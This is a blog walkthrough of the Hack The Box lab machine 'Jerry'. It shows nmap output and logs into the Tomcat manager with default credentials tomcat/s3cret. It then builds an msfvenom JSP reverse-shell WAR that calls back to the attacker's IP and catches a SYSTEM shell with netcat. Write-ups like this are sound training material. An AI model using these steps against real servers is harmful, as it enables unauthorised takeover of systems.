
hack the box walkthrough – Jerry machine
First Windows HTB machine for my blog today with probably the easiest one called Jerry.

Let’s jump it !
Enumeration
Again we start our enumeration phase with a nmap scanning on the given IP address:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.3 Full
Running a Full scan on 10.129.79.3
Host is likely running Windows
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:27 EST
Initiating Parallel DNS resolution of 1 host. at 10:27
Completed Parallel DNS resolution of 1 host. at 10:27, 0.03s elapsed
Initiating Connect Scan at 10:27
Scanning 10.129.79.3 [65535 ports]
Discovered open port 8080/tcp on 10.129.79.3
Completed Connect Scan at 10:31, 262.72s elapsed (65535 total ports)
Nmap scan report for 10.129.79.3
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
8080/tcp open http-proxy
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.79 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:31 EST
Nmap scan report for 10.129.79.3
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds
As you can see I am now getting used with nmapAutomator. It is very convenient and fast.
From the nmap scan result we can read that we are dealing with a Windows Machine and only a tomcat service is listening on port 8080.

Tomcat Access
Few login attempts on the tomcat web application manager gave me access with the combinaison login/password tomcat/s3cret

PRIVILEGE ESCALATION
Since I can deploy new application, I am going to create my reverse shell via a malicious war file.
[email protected]:~/Documents$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.64 LPORT=4242 -f war -o revshell.war
WARN: Unresolved or ambiguous specs during Gem::Specification.reset:
reline (>= 0)
Available/installed versions of this gem:
- 0.1.5
- 0.1.3
WARN: Clearing out unresolved specs. Try 'gem cleanup '
Please report a bug if this causes problems.
Payload size: 1089 bytes
Final size of war file: 1089 bytes
Saved as: revshell.war
I just need to deploy it from the tomcat web application manager:

Then it is available as application:

I ran my listener:
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
And ran the application by accessing it with the URL http://IP:8080/revshell/
The shell spawned with already all rights on the machine:
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.79.3] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system